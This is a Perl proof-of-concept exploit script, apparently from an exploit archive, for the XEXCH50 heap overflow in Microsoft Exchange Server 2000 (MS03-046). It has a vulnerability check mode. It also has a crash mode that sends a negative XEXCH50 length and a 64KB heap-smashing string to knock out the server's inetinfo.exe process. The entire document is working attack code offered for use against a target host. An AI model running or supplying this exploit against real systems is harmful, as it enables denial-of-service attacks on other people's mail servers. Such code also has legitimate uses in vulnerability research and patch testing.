Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (PoC) (MS03-046) - CVE-2003-0714

  1. #!/usr/bin/perl -w
  2. ##################
  3.  
  4. ##
  5. # ms03-046.pl - hdm metasploit com
  6. # This vulnerability allows a remote unauthenticated user to overwrite big chunks
  7. # of the heap used by the inetinfo.exe process. Reliably exploiting this bug is
  8. # non-trivial; even though the entire buffer is binary safe (even nulls) and can be
  9. # just about any size, the actual code that crashes varies widely with each request.
  10. # During the analysis process, numerous combinations of request size, concurrent
  11. # requests, pre-allocations, and alternate trigger routes were examined and not a
  12. # single duplicate of location and data offset was discovered. Hopefully the magic
  13. # combination of data, size, and setup will be found to allow this bug to be reliably
  14. # exploited.
  15.  
  16. # minor bugfix: look for 354 Send binary data
  17.  
  18. use strict;
  19. use IO::Socket;
  20.  
  21. my $host = shift() || usage();
  22. my $mode = shift() || "CHECK";
  23. my $port = 25;
  24.  
  25.  
  26. if (uc($mode) eq "CHECK") { check() }
  27. if (uc($mode) eq "CRASH") { crash() }
  28.  
  29. usage();
  30.  
  31.  
  32. sub check
  33. {
  34.     my $s = SMTP($host, $port);
  35.     if (! $s)
  36.     {
  37.         print "[*] Error establishing connection to SMTP service.\n";
  38.         exit(0);
  39.     }
  40.  
  41.     print $s "XEXCH50 2 2\r\n";
  42.     my $res = <$s>;    
  43.     close ($s);
  44.  
  45.     # a patched server only allows XEXCH50 after NTLM authentication
  46.     if ($res !~ /354 Send binary/i)
  47.     {
  48.         print "[*] This server has been patched or is not vulnerable.\n";
  49.         exit(0);
  50.     }
  51.  
  52.     print "[*] This system is vulnerable: $host:$port\n";
  53.  
  54.     exit(0);
  55. }
  56.  
  57.  
  58. sub crash
  59. {
  60.     my $s = SMTP($host, $port);
  61.     if (! $s)
  62.     {
  63.         print "[*] Error establishing connection to SMTP service.\n";
  64.         exit(0);
  65.     }
  66.  
  67.     # the negative value allows us to overwrite random heap bits
  68.     print $s "XEXCH50 -1 2\r\n";
  69.     my $res = <$s>;    
  70.  
  71.     # a patched server only allows XEXCH50 after NTLM authentication
  72.     if ($res !~ /354 Send binary/i)
  73.     {
  74.         print "[*] This server has been patched or is not vulnerable.\n";
  75.         exit(0);
  76.     }
  77.  
  78.     print "[*] Sending massive heap-smashing string...\n";
  79.     print $s ("META" x 16384);
  80.  
  81.     # sometimes a second connection is required to trigger the crash
  82.     $s = SMTP($host, $port);
  83.  
  84.     exit(0);
  85. }
  86.  
  87.  
  88. sub usage
  89. {
  90.     print STDERR "Usage: $0 <host> [CHECK|CRASH]\n";
  91.     exit(0);
  92.  
  93. }
  94.  
  95. sub SMTP
  96. {
  97.     my ($host, $port) = @_;
  98.     my $s = IO::Socket::INET->new
  99.     (
  100.         PeerAddr => $host,
  101.         PeerPort => $port,
  102.         Proto    => "tcp"
  103.     ) || return(undef);
  104.  
  105.     my $r = <$s>;
  106.     return undef if !$r;
  107.    
  108.     if ($r !~ /Microsoft/)
  109.     {
  110.         chomp($r);
  111.         print STDERR "[*] This does not look like an exchange server: $r\n";
  112.         return(undef);
  113.     }
  114.    
  115.     print $s "HELO X\r\n";
  116.     $r = <$s>;
  117.     return undef if !$r;  
  118.  
  119.     print $s "MAIL FROM: DoS\r\n";
  120.     $r = <$s>;
  121.     return undef if !$r;
  122.    
  123.     print $s "RCPT TO: Administrator\r\n";
  124.     $r = <$s>;
  125.     return undef if !$r;
  126.    
  127.     return($s);
  128. }
  129.  
  130.  
  131. # milw0rm.com [2003-10-22]
  132.            